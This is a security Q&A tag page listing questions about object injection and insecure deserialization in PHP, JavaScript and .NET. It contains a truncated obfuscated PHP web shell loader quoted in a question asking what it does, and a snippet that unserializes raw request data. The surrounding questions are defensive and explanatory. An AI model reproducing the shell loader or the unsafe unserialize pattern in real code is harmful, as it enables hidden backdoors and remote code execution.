Questions tagged [object-injection]

A class of vulnerabilities stemming from deserialization of unsanitized user data.

13 questions
14 votes, 2 answers

Variable Assigned to Object Injection Sink (security/detect-object-injection)

I am testing my code on ESLint. It says: Variable Assigned to Object Injection Sink (security/detect-object-injection). I'm not using an outer resource to assign it to my variable, though. Is there really a problem in the var a = newArray[c];…
Andy
11 votes, 2 answers

Is PHP unserialize() exploitable without any magic methods?

Say that there was a publicly accessible web page with the following PHP code: noExploits(); ?> The…
Tryth
4 votes, 1 answer

Injected malicious code in temporary files

It just came to my mind that a few years ago many iOS applications were infected by XcodeGhost (notably WeChat). This made me think about a few possible scenarios: Malicious code injected in object files Compilers produce many temporary files and those…
Adriano Repetti
4 votes, 1 answer

Is it possible to exploit PHP unserialize without classes?

I'm assessing the security of a web portal for a client and I found a vulnerability. The code is basically doing this: $var = unserialize($_REQUEST['something']); I have complete control over the variable. But there are no classes in the server's code,…
GMX Rider
3 votes, 3 answers

Secure method to store PHP object in MySQL database?

How do I securely save PHP objects in a MySQL Database? If you use the serialize and unserialize functions, you may end up with Object Injections. Is there a predefined standard on how to handle this? Note that SQL injection =/= object injection! So…
Critical joe
2 votes, 1 answer

Insecure Deserialization in C# (.NET) - How to identify and test

I have been reading up on Insecure Deserialization and how it can affect Java applications. https://owasp.org/index.php/Top_10-2017_A8-Insecure_Deserialization If the captured traffic data include the following patterns it may suggest that the data…
Ogglas
2 votes, 1 answer

Is JavaScript object injection exploitable?

I'm testing a site that behaves like this: When I change my username, I submit a POST request with JSON data like this {"username":"John"}. If I change that to for example {"username":{"test":"test"}}, my username is printed like this: [object…
pineappleman
1 vote, 1 answer

How can PHP unserialize() object injection be used to bypass authentication?

So I came across this authentication bypass security notice and the fix for it was simply changing all serialization to JSON encoding. I am just wondering how this is really exploitable? I know that unserialize() can be used to perform…
vincentleest
1 vote, 3 answers

Is using JSON really enough to fix PHP object insertion?

So I was just reading up on the OWASP site about PHP Object Injection. According to their site, the suggested fix is to not use serialize and unserialize but to use json_encode and json_decode. However, after doing a few tests in a limited amount of…
DarkMantis
1 vote, 1 answer

Dynamic class load for server side application

Is there a problem with using reflection (specifically class.forName) in a server-side application? My main thread about this is someone injecting code by dumping memory in the JVM and adding commands in a reference memory field, but this is unlikely in server…
1 vote, 0 answers

What's the point of this php shell?

What is the point of this shell code? There is no other code in the file. @preg_match_all("/\t \t(.+)\t\t/Ui",@file_get_contents(__FILE__),$r); $w="";foreach($r[1] as $v){@$w.=@chr(@strlen($v));} $e=explode("!",$w);@$e[0](/* */…
beppe9000
1 vote, 2 answers

Why does this PHP object injection exploit work?

I have recently created some PHP code vulnerable to object injection. Here is the code of my one.php file where I unserialize the data parameter:
januu agrawal
0 votes, 1 answer

Why doesn't object injection work, although the payload is stored along with session cookies, on unpatched Joomla 2.5.11?

I have read and understood object injection from this question. Then I wanted to test the security issue behind Joomla CMS object injection through serialization. TEST MACHINE XAMPP 1.7.3 for Windows Apache/2.2.14 (Win32) PHP/5.3.1 Joomla…